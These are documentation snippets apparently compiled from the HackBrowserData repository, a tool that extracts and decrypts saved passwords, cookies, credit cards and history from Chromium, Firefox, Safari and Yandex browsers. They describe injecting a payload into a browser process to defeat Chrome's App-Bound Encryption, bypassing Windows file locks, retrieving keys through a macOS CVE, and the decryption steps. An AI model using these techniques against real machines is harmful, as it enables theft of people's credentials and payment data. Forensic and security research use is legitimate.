### Build HackBrowserData from Source

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/README.md

Clone the repository and build the command-line tool using Go. Ensure you have Go 1.20+ installed.

```bash
git clone https://github.com/moonD4rk/HackBrowserData
cd HackBrowserData
go build ./cmd/hack-browser-data/
```

--------------------------------

### Build, Test, and Lint Go Project

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/CONTRIBUTING.md

Standard commands for building, testing, and linting the Go project. Ensure golangci-lint v2 is installed for linting.

```bash
# Build
go build ./cmd/hack-browser-data/
```

```bash
# Test
go test ./...
```

```bash
# Lint (requires golangci-lint v2)
golangci-lint run
```

--------------------------------

### Browser Selection Entry Points

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/001-project-architecture.md

Illustrates the two main entry points for browser data handling: PickBrowsers for extraction and DiscoverBrowsers for listing. PickBrowsers includes decryption setup, while DiscoverBrowsers skips it.
```text
PickBrowsers(opts)                      // used by `dump` — ready to Extract
  → pickFromConfigs(configs, opts)      // shared discovery core
      → platformBrowsers()              // build-tagged list for this OS
      → filter by name / profile path
      → newBrowsers(cfg)                // dispatch to chromium/firefox/safari.NewBrowsers
          → discoverProfiles()          // scan profile subdirectories
          → resolveSourcePaths()        // stat candidates, first match wins
  → newPlatformInjector(opts)           // build-tagged: returns a func(Browser)
  → for each browser:                   // closure captures retriever + keychain pw lazily
        inject(b)                       // type-assert retrieverSetter / keychainPasswordSetter

DiscoverBrowsers(opts)                  // used by `list` / `list --detail`
  → pickFromConfigs(configs, opts)      // same shared discovery core, NO injection
```

--------------------------------

### CLI Command Example

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/007-cli-and-output-design.md

This command dumps specific data categories (password, cookie) from Chrome browsers into CSV files within a `results` directory. It specifies the output format and the target categories.

```bash
hack-browser-data dump -b chrome -c password,cookie -f csv -d results
```

--------------------------------

### Use Custom Browser Profile Path

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/README.md

Specifies a custom path to the browser's profile directory, useful for non-standard installations.

```bash
hack-browser-data dump -b chrome -p "/path/to/User Data/Default"
```

--------------------------------

### Build Chrome ABE Payload DLL

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/CLAUDE.md

Build the C payload DLL for Chrome ABE integration on Windows. Requires zig, which can be installed via Homebrew.

```bash
make payload
```

--------------------------------

### Conventional Commits Examples

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/CONTRIBUTING.md

Examples of commit messages following the Conventional Commits specification.
Use these to categorize changes like features, fixes, chores, docs, refactors, and tests.

```text
feat: add support for new browser
```

```text
fix: resolve cookie decryption on Windows
```

```text
chore: update dependencies
```

```text
docs: improve RFC documentation
```

```text
refactor: simplify profile discovery logic
```

```text
test: add extraction tests for Firefox
```

--------------------------------

### LevelDB Directory Copying

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/008-file-acquisition-and-platform-quirks.md

Demonstrates how the Acquire function handles LevelDB directories by copying the entire directory while specifically skipping the LOCK file, so as not to interfere with the running browser.

```text
When `isDir=true`, `Acquire` copies the entire directory while **skipping the `LOCK` file**.
LevelDB uses this file for single-process access control; copying it could interfere with
the running browser.
```

--------------------------------

### Acquire Flow Logic

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/008-file-acquisition-and-platform-quirks.md

Illustrates the decision tree for acquiring files or directories. It shows how companion files are handled for regular files and how locked files are managed on Windows.

```text
Acquire(src, dst, isDir)
├── isDir=true  → copyDir(src, dst, skip="lock")
│
└── isDir=false → copyFile(src, dst)
    ├── success → copy -wal and -shm companions if present
    └── failure + Windows → copyLocked(src, dst) fallback
```

--------------------------------

### Path Matching with Short-Name Tolerance

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/009-windows-locked-file-bypass.md

Demonstrates how to compare file paths while tolerating Windows 8.3 short path names by extracting and comparing a stable suffix.
```text
Input:  C:\Users\RUNNER~1\AppData\Local\Google\Chrome\...\Network\Cookies
Suffix: google\chrome\...\network\cookies

Input:  C:\Users\runneradmin\AppData\Local\Google\Chrome\...\Network\Cookies
Suffix: google\chrome\...\network\cookies

→ match!
```

--------------------------------

### Yandex Credit Card Row Encryption

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/012-yandex-decryption.md

Credit card private data is AES-GCM sealed with the row's GUID as AAD. The decrypted data is a JSON object containing sensitive card details.

```plaintext
Same byte shape as passwords but AAD = the row's `guid` bytes (plus optional keyID).
Decrypted plaintext is a JSON object with `full_card_number`, `pin_code`, `secret_comment`.
The sibling `public_data` column is plaintext JSON with `card_holder`, `card_title`,
`expire_date_month`, `expire_date_year`.
```

--------------------------------

### Build HackBrowserData CLI

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/CLAUDE.md

Build the main CLI executable. Ensure you are using Go 1.20 for module operations.

```bash
go build ./cmd/hack-browser-data/
```

--------------------------------

### Manage Go Modules

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/CLAUDE.md

Ensure Go module dependencies are tidy and verified. Crucially, use Go 1.20 to avoid bumping the Go directive version.

```bash
export GOROOT=$(brew --prefix go@1.20)/libexec && export PATH=$GOROOT/bin:$PATH
go mod tidy
```

```bash
go mod verify
```

--------------------------------

### Lint Code with golangci-lint

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/CLAUDE.md

Run the linter to check for code style and potential issues. Requires golangci-lint v2.

```bash
golangci-lint run
```

--------------------------------

### List Detected Browsers and Profiles

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/README.md

Lists all detected browsers and their profiles on the system.
```bash
hack-browser-data list
```

--------------------------------

### Format Code with gofumpt and goimports

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/CLAUDE.md

Format Go source files. gofumpt provides stricter formatting than gofmt. goimports updates imports and formats.

```bash
gofumpt -l -w .
```

```bash
goimports -w -local github.com/moond4rk/hackbrowserdata .
```

--------------------------------

### ABE Payload Build Command (Make)

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/010-chrome-abe-integration.md

This make command builds the ABE payload binary for Windows release. It uses zig cc to compile the C code into an amd64 binary and then embeds it into the Go executable using the `abe_embed` build tag.

```text
make build-windows = make payload (zig cc → crypto/abe_extractor_amd64.bin)
                   + GOOS=windows go build -tags abe_embed
```

--------------------------------

### macOS Key Retrieval Strategies

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/006-key-retrieval-mechanisms.md

Illustrates the different methods for retrieving encryption keys on macOS, including memory dumping, keychain password access, and command-line invocation.

```text
| Priority | Strategy                  | Requires            | Interactive? |
|----------|---------------------------|---------------------|:------------:|
| 1        | Gcoredump (CVE-2025-2024) | Root                | No           |
| 2        | Keychain password         | `--keychain-pw` flag | No           |
| 3        | `security` CLI command    | Nothing             | Yes (dialog) |
```

--------------------------------

### Data Flow Diagram

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/007-cli-and-output-design.md

This diagram illustrates the sequence of operations for the `dump` command, from parsing CLI arguments to writing and optionally compressing the output data.
```text
CLI: hack-browser-data dump -b chrome -c password,cookie -f csv -d results
  → PickBrowsers(name="chrome")           → []Browser
  → parseCategories("password,cookie")    → []Category
  → NewWriter("results", "csv")           → *Writer
  → for each browser:
        Extract(categories)               → *BrowserData
        Writer.Add(browser, profile, data)
  → Writer.Write()
        → aggregate by category → format rows → write files
  → (optional) CompressDir → results.zip
```

--------------------------------

### List Browsers with Per-Category Counts

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/README.md

Lists detected browsers and profiles, including detailed counts for each data category.

```bash
hack-browser-data list --detail
```

--------------------------------

### List Browsers and Profiles

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/README.md

Lists detected browsers and their profiles.

````APIDOC
## list - List detected browsers and profiles

### Parameters

#### Flags

- `--detail` (boolean) - Show per-category entry counts (default `false`)

### Request Example

```bash
hack-browser-data list
hack-browser-data list --detail
```
````

--------------------------------

### Run Tests for HackBrowserData

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/CLAUDE.md

Execute all tests in the project. Use the verbose flag for detailed output and coverage mode to generate a coverage profile.

```bash
go test ./...
```

```bash
go test -v ./... -covermode=count -coverprofile=coverage.out
```

--------------------------------

### Download Entry Keys

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/011-safari-data-storage.md

Lists the relevant keys found in Safari's Downloads.plist for each download entry, including URL, local path, and bytes received.
```markdown
| Key                                  | Meaning                                              |
|--------------------------------------|------------------------------------------------------|
| `DownloadEntryURL`                   | Source URL                                           |
| `DownloadEntryPath`                  | Local filesystem path                                |
| `DownloadEntryBytesReceivedSoFar`    | Bytes downloaded                                     |
| `DownloadEntryProfileUUIDStringKey`  | Owning profile's uppercase UUID, or `"DefaultProfile"` |
```

--------------------------------

### Windows Key Retrieval Flow

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/006-key-retrieval-mechanisms.md

Illustrates the process of extracting the encrypted key from Local State and its subsequent decryption via DPAPI.

```text
Local State → os_crypt.encrypted_key (base64 string)

| "DPAPI" prefix | DPAPI-encrypted AES key  |
|----------------|--------------------------|
| 5B (ASCII)     | remaining bytes          |

→ strip prefix
→ CryptUnprotectData (Crypt32.dll)
→ 32-byte AES-256 master key
```

--------------------------------

### Native Payload Injection into Browser Process

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/010-chrome-abe-integration.md

Details the steps for injecting a native payload into a suspended browser process. This includes allocating memory, writing the patched payload, and resuming the thread to execute the payload.

```text
CreateProcessW(browser.exe, CREATE_SUSPENDED)
VirtualAllocEx(target, RWX, sizeOf(payload))
WriteProcessMemory(patched bytes)
ResumeThread(mainThread) + Sleep(500ms)   // let ntdll finish loader init
CreateRemoteThread(target, remoteBase + bootstrapFileOffset)
```

--------------------------------

### Cross-Compile HackBrowserData

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/CLAUDE.md

Cross-compile the CLI for different operating systems and architectures. Requires Go 1.20.
```bash
GOOS=windows GOARCH=amd64 go build ./cmd/hack-browser-data/
```

```bash
GOOS=linux GOARCH=amd64 go build ./cmd/hack-browser-data/
```

--------------------------------

### Cross-platform Build for HackBrowserData

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/README.md

Compile the HackBrowserData tool for different operating systems and architectures using Go's cross-compilation features.

```bash
# For Windows (standard build, no Chromium 127+ ABE cookie support)
GOOS=windows GOARCH=amd64 go build ./cmd/hack-browser-data/

# For Linux
GOOS=linux GOARCH=amd64 go build ./cmd/hack-browser-data/
```

--------------------------------

### Dual-Tier Key Retrievers on Windows

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/006-key-retrieval-mechanisms.md

Shows the mapping of key retriever slots to their respective sources and encryption mechanisms on Windows.

```text
| Slot | Retriever        | Source field                       | Mechanism                                                                              |
|------|------------------|------------------------------------|----------------------------------------------------------------------------------------|
| V10  | `DPAPIRetriever` | `os_crypt.encrypted_key`           | `CryptUnprotectData` (Crypt32.dll)                                                     |
| V20  | `ABERetriever`   | `os_crypt.app_bound_encrypted_key` | IElevator via reflective injection (see [RFC-010](010-chrome-abe-integration.md))      |
```

--------------------------------

### Format Go Code

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/CONTRIBUTING.md

Commands to format Go code using gofumpt and goimports. The goimports command is configured to handle local imports.

```bash
# Format
gofumpt -l -w .
goimports -w -local github.com/moond4rk/hackbrowserdata .
```

--------------------------------

### Windows Locked File Bypass Solution Overview

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/009-windows-locked-file-bypass.md

Outlines the steps to bypass Windows exclusive file locks using kernel APIs: finding Chrome's handle, duplicating it, and reading via memory-mapped I/O.
```text
NtQuerySystemInformation → find Chrome's handle to Cookies file
  → DuplicateHandle into our process
  → CreateFileMappingW + MapViewOfFile (read from kernel cache)
  → write bytes to temp destination
```

--------------------------------

### ABE Retriever Integration in Go

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/010-chrome-abe-integration.md

Shows how the ABE Retriever is integrated into the key retrieval chain in the Go process. It reads the Local State file, extracts the APPB-prefixed blob, and resolves the browser executable path.

```text
browser/chromium.Extract()
  → keyretriever.Chain [ABERetriever, DPAPIRetriever]
  → ABERetriever.RetrieveKey():
        reads Local State → extracts APPB-prefixed blob
        resolves browser exe via registry App Paths
  → utils/injector.Reflective.Inject(exePath, payload, env)
```

--------------------------------

### CompressDir Utility

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/008-file-acquisition-and-platform-quirks.md

Describes the CompressDir utility, which archives all files in a specified directory into a single zip file and then removes the original files.

```text
CompressDir compresses all files in the output directory into a single `.zip` file
(used by `--zip` flag). Original files are removed after archiving.
```

--------------------------------

### Display HackBrowserData Help Information

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/README.md

Shows the main help message for hack-browser-data, outlining available commands and global flags.

```bash
hack-browser-data -h
```

--------------------------------

### Extract() Orchestration Flow

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/001-project-architecture.md

Details the common extraction pattern for Chromium and Firefox engines, including session creation, file acquisition, master key retrieval, category extraction, and temporary directory cleanup.

```text
Extract(categories)
  1. NewSession()              → create isolated temp directory
  2. acquireFiles(session)     → copy source files to temp dir (with dedup and WAL/SHM)
  3. getMasterKey(session)     → platform-specific key retrieval
  4. for each category:        extractCategory(data, cat, masterKey, path)
  5. defer session.Cleanup()   → remove temp directory
```

--------------------------------

### ABE Retriever Default Configuration (Go)

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/010-chrome-abe-integration.md

This describes the default retriever configuration on Windows, which includes both V10 (DPAPI) and V20 (ABE) retrievers. They are wired independently to handle profiles with mixed ciphertext versions.

```text
keyretriever.DefaultRetrievers() on Windows returns a Retrievers struct
with V10 = &DPAPIRetriever{} and V20 = &ABERetriever{}
```

--------------------------------

### Linux PBKDF2 Parameters

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/003-chromium-encryption.md

Lists the PBKDF2 parameters used for key derivation in Linux Chromium encryption (v10 and v11).

```plaintext
| Parameter  | Value              |
|------------|--------------------|
| Hash       | SHA-1              |
| Salt       | `saltysalt`        |
| Iterations | 1                  |
| Key length | 16 bytes (AES-128) |
```

--------------------------------

### LocalStorage Nested SQLite Structure

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/011-safari-data-storage.md

Details the directory structure for Safari 17+ localStorage, showing the partition-aware nested tree leading to localstorage.sqlite3 databases.

```markdown
///
├── origin                        ← binary-serialized origins (top + frame)
└── LocalStorage/
    ├── localstorage.sqlite3      ← ItemTable(key TEXT UNIQUE, value BLOB NOT NULL)
    ├── localstorage.sqlite3-shm
    └── localstorage.sqlite3-wal
```

--------------------------------

### Print HackBrowserData Version

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/README.md

Prints the current version of the hack-browser-data tool.
```bash
hack-browser-data version
```

--------------------------------

### Windows Build with App-Bound Encryption Support

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/README.md

Build HackBrowserData for Windows with support for decrypting cookies from newer Chromium versions (127+) that use App-Bound Encryption. This requires Zig (0.13+) or MinGW-w64 gcc.

```bash
# 1. Install Zig
brew install zig     # macOS
scoop install zig    # Windows (scoop)
```

--------------------------------

### LocalStorage Root Paths by Profile

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/011-safari-data-storage.md

Indicates the root directory paths for localStorage data based on the Safari profile (Default or Named).

```markdown
| Profile | Root path                                       |
|---------|-------------------------------------------------|
| Default | `Container/WebKit/WebsiteData/Default/`         |
| Named   | `Container/WebKit/WebsiteDataStore//Origins/`   |
```

--------------------------------

### Query Firefox LocalStorage

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/004-firefox-data-storage.md

Retrieve LocalStorage data from Firefox's webappsstore.sqlite. The `originKey` column uses a reversed-host format.

```sql
SELECT originKey, key, value FROM webappsstore2
```

--------------------------------

### Time-Shared Scratch Region Usage

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/010-chrome-abe-integration.md

Explains the time-sharing mechanism of the scratch region at `0x40..0x5F`. Go writes import pointers before injection, the Bootstrap routine reads them once, and DllMain overwrites them with the master key.

```plaintext
0x40..0x5F is **time-shared**: Go writes import pointers pre-injection;
Bootstrap reads them once at function start; then DllMain overwrites the
same bytes with the key. No concurrent readers.
```

--------------------------------

### KeyRetriever Interface Definition

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/006-key-retrieval-mechanisms.md

Defines the Hints struct used by KeyRetrievers to specify platform-specific information. Callers populate Hints from BrowserConfig.

```go
type Hints struct {
	// macOS Keychain account / Linux D-Bus Secret Service item label
	// (e.g. "Chrome", "Chrome Safe Storage")
	KeychainLabel string

	// Windows ABE browser key used by ABERetriever to locate the
	// elevation-service COM interface (e.g. "chrome", "edge").
	// "" → ABE not applicable; ABERetriever returns (nil, nil) silently.
	WindowsABEKey string

	// Path to Local State JSON. Only used on Windows
	// (DPAPI + ABE both read it).
	LocalStatePath string
}
```

--------------------------------

### Query Downloads from History SQLite

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/002-chromium-data-storage.md

SQL query to retrieve download information such as target path, source URL, file size, and timestamps from the `downloads` table. Shares the `History` database.

```sql
SELECT target_path, tab_url, total_bytes, start_time, end_time, mime_type FROM downloads
```

--------------------------------

### Bootstrap Scratch Layout Assertions (C)

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/010-chrome-abe-integration.md

These C static assertions ensure the layout of the BootstrapScratch struct in memory matches the expected offsets for communication between the Go injector and the C payload. They are used with `go tool cgo -godefs` to generate Go constants.
```c
#include <stddef.h>  /* offsetof */

/* struct BootstrapScratch itself is declared in the payload's bootstrap_layout.h
 * (not reproduced here); these assertions pin the field offsets the Go side
 * reads and writes. */
_Static_assert(offsetof(struct BootstrapScratch, marker) == 0x28, "marker offset");
_Static_assert(offsetof(struct BootstrapScratch, hresult) == 0x2C, "hresult offset");
_Static_assert(offsetof(struct BootstrapScratch, shared) == 0x40, "shared offset");
```

--------------------------------

### Query Firefox Downloads

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/004-firefox-data-storage.md

Extract download metadata from Firefox's places.sqlite by joining moz_annos and moz_places tables. Download information is stored as a concatenated string.

```sql
SELECT place_id, GROUP_CONCAT(content), url, dateAdded
FROM (SELECT * FROM moz_annos INNER JOIN moz_places ON moz_annos.place_id = moz_places.id) t
GROUP BY place_id
```

--------------------------------

### C Payload Build Configuration

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/010-chrome-abe-integration.md

Specifies the build toolchain and target architecture for the native C payload. It emphasizes the use of `zig cc` for cross-compilation and the x86_64 architecture.

```text
Built with `zig cc -target x86_64-windows-gnu`.
```

--------------------------------

### BinaryCookies High-Level Layout

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/011-safari-data-storage.md

Illustrates the structure of Apple's proprietary BinaryCookies format, showing the magic number, page count, page sizes, and variable-sized pages.

```markdown
| "cook" magic | page_count | page_sizes[]     | pages[]  |
|--------------|------------|------------------|----------|
| 4B           | 4B (BE)    | page_count × 4B  | variable |
```

--------------------------------

### Compress Output to Zip Archive

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/README.md

Compresses the exported browser data into a zip archive.
```bash
hack-browser-data dump --zip
```

--------------------------------

### Firefox privateKeyPBE Key Derivation

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/005-firefox-encryption.md

Explains the NSS PBE-SHA1-3DES derivation process for master keys, including the calculation of intermediate values and the final key and IV.

```plaintext
hp  = SHA1(globalSalt)
ck  = SHA1(hp || entrySalt)
k1  = HMAC-SHA1(ck, pad(entrySalt,20) || entrySalt)
k2  = HMAC-SHA1(ck, HMAC-SHA1(ck, pad(entrySalt,20)) || entrySalt)
dk  = k1 || k2                     // 40 bytes
key = dk[:24], iv = dk[32:40]      // 3DES key + IV
```

--------------------------------

### Directory Structure of HackBrowserData

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/001-project-architecture.md

Illustrates the organizational structure of the HackBrowserData project, detailing the purpose of each top-level directory and its subdirectories.

```tree
HackBrowserData/
├── cmd/hack-browser-data/   # CLI entrypoint: cobra root, dump, list, version
├── browser/                 # Browser interface, PickBrowsers(), platform browser lists
│   ├── chromium/            # Chromium engine: extraction, decryption, profile discovery
│   └── firefox/             # Firefox engine: extraction, NSS key derivation
├── types/                   # Data model: Category enum, Entry structs, BrowserData
├── crypto/                  # Encryption primitives, cipher version detection
│   └── keyretriever/        # Platform-specific master key retrieval (Keychain/DPAPI/D-Bus)
├── filemanager/             # Temp file session, locked file handling (Windows)
├── output/                  # Output Writer: CSV, JSON, CookieEditor formatters
├── log/                     # Logging with level filtering
└── utils/                   # SQLite query helpers, file utilities
```

--------------------------------

### macOS PBKDF2 Key Derivation Parameters

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/006-key-retrieval-mechanisms.md

Specifies the parameters used for deriving the AES-128 key from a raw password string on macOS via PBKDF2.
```text
| Parameter  | Value              | Source |
|------------|--------------------|--------|
| Salt       | `"saltysalt"`      | [os_crypt_mac.mm](https://source.chromium.org/chromium/chromium/src/+/master:components/os_crypt/os_crypt_mac.mm;l=157) |
| Iterations | 1003               |        |
| Key length | 16 bytes (AES-128) |        |
| Hash       | HMAC-SHA1          |        |
```

--------------------------------

### Export Browser Data in JSON Format

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/README.md

Exports browser data in JSON format to a specified output directory. Useful for machine-readable output.

```bash
hack-browser-data dump -b chrome -f json -d output
```

--------------------------------

### Print Version Information

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/README.md

Prints the version information of the hack-browser-data tool.

````APIDOC
## version - Print version information

### Request Example

```bash
hack-browser-data version
```
````

--------------------------------

### Reading Locked Files via Memory-Mapped I/O

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/009-windows-locked-file-bypass.md

Details the process of reading a locked file using memory-mapped I/O, which accesses the OS kernel's file cache for a more complete snapshot.
```text
| DuplicateHandle (read access)                   |
|-------------------------------------------------|
                        ↓
| CreateFileMappingW(handle, PAGE_READONLY)       |
|-------------------------------------------------|
                        ↓
| MapViewOfFile(mapping, FILE_MAP_READ, fileSize) |
|-------------------------------------------------|
                        ↓
| byte slice from kernel file cache               |
| (includes uncommitted WAL data from Chrome)     |
|-------------------------------------------------|
                        ↓
| os.WriteFile(destination, bytes, 0600)          |
|-------------------------------------------------|
```

--------------------------------

### Extract Safari History Items and Visits

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/011-safari-data-storage.md

This SQL query selects URLs, titles, visit counts, and visit times from Safari's history. It joins the history_items and history_visits tables, prioritizing the most recent visit for each item and sorting results by visit count in descending order. The visit_time uses the Core Data epoch.

```sql
SELECT url, title, visit_count, visit_time
FROM history_items
LEFT JOIN history_visits ON history_items.id = history_visits.history_item
```

--------------------------------

### Export Cookies in CookieEditor Format

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/README.md

Exports cookies in a format compatible with the Cookie Editor browser extension.

```bash
hack-browser-data dump -f cookie-editor
```

--------------------------------

### Check for Typos

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/CONTRIBUTING.md

Command to perform a spelling check on the project files using the `typos` tool.

```bash
# Spelling check
typos
```

--------------------------------

### Query URLs from History SQLite

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/002-chromium-data-storage.md

SQL query to fetch browsing history data including URL, title, visit count, and last visit time from the `urls` table. Results are sorted by visit count.
```sql
SELECT url, title, visit_count, last_visit_time FROM urls
```

--------------------------------

### Firefox Login Decryption Pipeline

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/005-firefox-encryption.md

Visualizes the step-by-step process for decrypting Firefox login credentials, from base64 encoded string to plaintext.

```text
logins.json → encryptedUsername / encryptedPassword (base64 string)

| base64 encoded string                                    |
|----------------------------------------------------------|
                ↓ base64 decode
| raw ASN1 DER bytes                                       |
|----------------------------------------------------------|
                ↓ ASN1 parse (auto-detect credentialPBE)
| IV (8B or 16B) | ciphertext                              |
|----------------------------------------------------------|
                ↓ decrypt (3DES or AES-256 based on IV length)
| plaintext + PKCS5 padding                                |
|----------------------------------------------------------|
                ↓ strip PKCS5 padding
| plaintext (UTF-8 string)                                 |
|----------------------------------------------------------|
```

--------------------------------

### Global Flags

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/README.md

Flags that can be used with any command.

````APIDOC
### Global flags

| Flag        | Short | Description          |
|-------------|-------|----------------------|
| `--verbose` | `-v`  | Enable debug logging |

### Request Example

```bash
hack-browser-data -v dump
```
````

--------------------------------

### Regenerate Go Layout Constants

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/CLAUDE.md

Update Go layout constants from the C bootstrap_layout.h file. This is part of the Chrome ABE payload generation process.
```bash
make gen-layout
```

--------------------------------

### Firefox journal_mode=off Configuration

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/008-file-acquisition-and-platform-quirks.md

Explains the use of `journal_mode=off` for Firefox extract calls to prevent potential WAL replay issues with the modernc.org/sqlite driver on temporary copies.

```text
All Firefox extract calls use `journal_mode=off`. Firefox databases use WAL mode in
production, and the `modernc.org/sqlite` driver may attempt WAL replay on a temp copy.
Disabling the journal prevents this and treats the database as a read-only snapshot.
```

--------------------------------

### Remote Payload Execution and COM RPC Call

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/010-chrome-abe-integration.md

Illustrates the execution flow within the remote browser process. The injected payload's Bootstrap function calls DllMain, which then initiates the COM RPC to decrypt data using the elevation service.

```text
Bootstrap → see §4.1 (7 helpers + orchestrator)
    ↓ calls DllMain(DLL_PROCESS_ATTACH, imageBase)
DoExtractKey → see §4.2
    CoCreateInstance(CLSID, IID_v2 | fallback IID_v1)
    CoSetProxyBlanket(PKT_PRIVACY + IMPERSONATE)
    vtbl[slot]->DecryptData(bstrEnc)
        ↓ COM RPC
    elevation_service (SYSTEM) → returns 32-byte plaintext key
    publish_key()    → imageBase[0x40..0x5F]   (success)
    publish_error(code, hr, comErr)            (failure)
```

--------------------------------

### macOS PBKDF2 Parameters

Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/003-chromium-encryption.md

Specifies the PBKDF2 parameters used for key derivation in macOS Chromium encryption.

```plaintext
| Parameter  | Value              |
|------------|--------------------|
| Hash       | SHA-1              |
| Salt       | `saltysalt`        |
| Iterations | 1003               |
| Key length | 16 bytes (AES-128) |
```